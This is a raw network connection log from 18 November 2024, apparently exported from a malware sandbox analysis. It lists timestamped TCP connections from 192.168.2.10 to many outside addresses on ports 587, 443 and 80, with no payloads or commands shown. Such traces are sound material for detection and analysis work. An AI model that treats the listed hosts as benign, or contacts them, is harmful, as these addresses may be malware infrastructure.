                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.577327013 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.615171909 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.655329943 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.790014982 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.790066004 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.790122032 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.795286894 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:58.490545988 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:58.495640993 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:58.499636889 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.298537970 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.304847956 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.310528994 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.545109034 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.545281887 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.550126076 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.786170006 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.786669016 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.791554928 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033181906 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033209085 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033221960 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033235073 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033272028 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033303022 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.046624899 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.051503897 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.287183046 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.291992903 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.296948910 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.532656908 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.533032894 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.537993908 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.774097919 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.774507999 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.779459953 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.018470049 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.978282928 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979070902 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979070902 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979157925 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979202032 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979345083 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979345083 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979470015 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979470015 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979470015 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979470015 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984075069 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984086990 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984097004 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984179974 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984236956 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984353065 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984361887 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984427929 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984437943 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984453917 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:06.226747036 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:06.371274948 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:10.994431019 CET804997882.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:10.994715929 CET4997880192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:10.994977951 CET4997880192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:10.999758005 CET804997882.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.091238022 CET4999980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.096051931 CET804999982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.096231937 CET4999980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.096322060 CET4999980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.096322060 CET4999980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.101161957 CET804999982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.101175070 CET804999982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.449501991 CET4999980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.585391998 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.590325117 CET805000047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.592221975 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.592339993 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.592356920 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.597208977 CET805000047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.597222090 CET805000047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.943141937 CET5000180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.948117018 CET805000154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.948388100 CET5000180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.952994108 CET5000180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.952994108 CET5000180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.957951069 CET805000154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.957973957 CET805000154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.069251060 CET805000047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.069432974 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.074598074 CET805000047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.074666023 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.268124104 CET5000280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.273032904 CET805000213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.248648882 CET5000980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.248648882 CET5000980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.253561974 CET8050009172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.253580093 CET8050009172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.912935972 CET8050009172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.913611889 CET5000980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.923628092 CET5000980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.928699017 CET8050009172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.941530943 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.946819067 CET8050010172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.947340965 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.947443962 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.947443962 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.952426910 CET8050010172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.952444077 CET8050010172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.349637985 CET805000818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.395973921 CET5000880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.454737902 CET5000880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.460166931 CET805000818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.460306883 CET5000880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.616298914 CET8050010172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.616364002 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.616837978 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.619605064 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.622751951 CET8050010172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.624447107 CET8050011172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.624579906 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.626451015 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.626451015 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.631289005 CET8050011172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.631300926 CET8050011172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.636801958 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.641685963 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.641757965 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.642258883 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.642258883 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.647083998 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.647097111 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.284796000 CET8050011172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.284877062 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.309187889 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.314860106 CET8050011172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.416609049 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.421664000 CET8050013172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.421912909 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.427056074 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.427088022 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.431977987 CET8050013172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.431992054 CET8050013172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.088553905 CET8050013172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.088629007 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.099942923 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.112360954 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.113128901 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.117191076 CET8050013172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.218960047 CET805002054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.261897087 CET5002080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.338356972 CET805002054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.338505983 CET5002080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.340743065 CET5002080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.346499920 CET805002054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.611943960 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.616898060 CET805002135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.617036104 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.617110014 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.617110014 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.621973991 CET805002135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.621987104 CET805002135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.446959019 CET805002135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.447228909 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.452858925 CET805002135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.453042030 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.624962091 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.629770994 CET80500223.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.629848957 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.630033970 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.630162954 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.634815931 CET80500223.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.634890079 CET80500223.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.646817923 CET805001482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.649291039 CET5001480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.649350882 CET5001480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.651752949 CET5002380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.654099941 CET805001482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.657380104 CET805002382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.657495975 CET5002380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.657711983 CET5002380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.657756090 CET5002380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.662511110 CET805002382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.662559032 CET805002382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.303308010 CET80500223.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.303554058 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.308675051 CET80500223.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.308931112 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.487644911 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.492522955 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.492619038 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.512111902 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.516048908 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.516974926 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.521002054 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.282036066 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.336641073 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.336719990 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.341598988 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.341640949 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.558386087 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.669688940 CET5002580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.674597979 CET805002554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.674660921 CET5002580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.674824953 CET5002580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.194538116 CET805003182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.592175007 CET805003018.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.592437983 CET5003080192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.598189116 CET805003018.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.598320961 CET5003080192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.815876961 CET5003280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.820940018 CET805003244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.821085930 CET5003280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.821702003 CET5003280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.821743011 CET5003280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.826571941 CET805003244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.826584101 CET805003244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.482261896 CET805003244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.484405994 CET5003280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.490046024 CET805003244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.490197897 CET5003280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:41.394819975 CET5003380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:41.399781942 CET805003318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:41.399861097 CET5003380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:41.399964094 CET5003380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:41.399991035 CET5003380192.168.2.1018.141.10.107
